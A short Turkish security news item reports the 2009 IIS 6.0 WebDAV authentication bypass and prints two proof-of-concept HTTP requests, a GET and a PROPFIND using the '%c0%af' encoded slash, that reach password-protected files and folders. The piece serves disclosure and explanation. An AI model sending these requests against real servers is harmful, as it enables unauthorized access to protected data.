IIS 6.0 Güvenlik Açığı

Microsoft'un Internet Information Server (IIS) 6.0 versiyonunda WebDav'dan kaynaklanan bir güvenlik açığı tespit edildi. Bu açıkla birlikte şifre korumalı dizinlere ulaşım sağlanabiliyor ve dosya yükleme işlemleri gerçekleştirilebiliyor. Ayrıca açık sadece WebDav klasörlerinde de geçerli değil, sunucunun barındırdığı tüm dizinleri kapsıyor.

Güvenlik uzmanı Nicolaos Rangos'un bildirdiğine göre aşağıdaki örnekteki gibi bir header gönderildiğinde korumalı bir dosya sıradan bir dosyaya dönüşebiliyor.

GET /..%c0%af/protected/protected.zip HTTP/1.1
Translate: f
Connection: close
Host: servername

Bu örnekte slash (/) karakteri %c0%af unikodu ile gizlenmiş durumda ve güvenlik fonksiyonu bunu atlamakta bu nedenle /protected/protected.zip dosyasına ulaşım sağlanabiliyor. Translate: f seçeneği ise sıradan dosyalar için WebDav fonksiyonunu devreye sokuyor.

Doğrudan WebDav klasörlerine erişmek ise daha karmaşık olsada imkansız değil.

PROPFIND /protec%c0%afted/ HTTP/1.1
Host: servername
User-Agent: neo/0.12.2
Connection: TE
TE: trailers
Depth: 1
Content-Length: 288
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<propfind xmlns="DAV:"><prop>
<getcontentlength xmlns="DAV:"/>
<getlastmodified xmlns="DAV:"/>
<executable xmlns="http://apache.org/dav/props/"/>
<resourcetype xmlns="DAV:"/>
<checked-in xmlns="DAV:"/>
<checked-out xmlns="DAV:"/>
</prop></propfind>

Fakat bu yöntemlerle asp betiklerini çekebilmek mümkün değil. Benzer bir güvenlik açığı 2000 yılında IIS 4 üzerinde de tespit edilmişti. Güvenlik uzmanı Thierry Zoller bu iki güvenlik açığını kendi blogunda karşılaştırmış.

Kaynak: http://seclists.org/fulldisclosure/2009/May/0134.html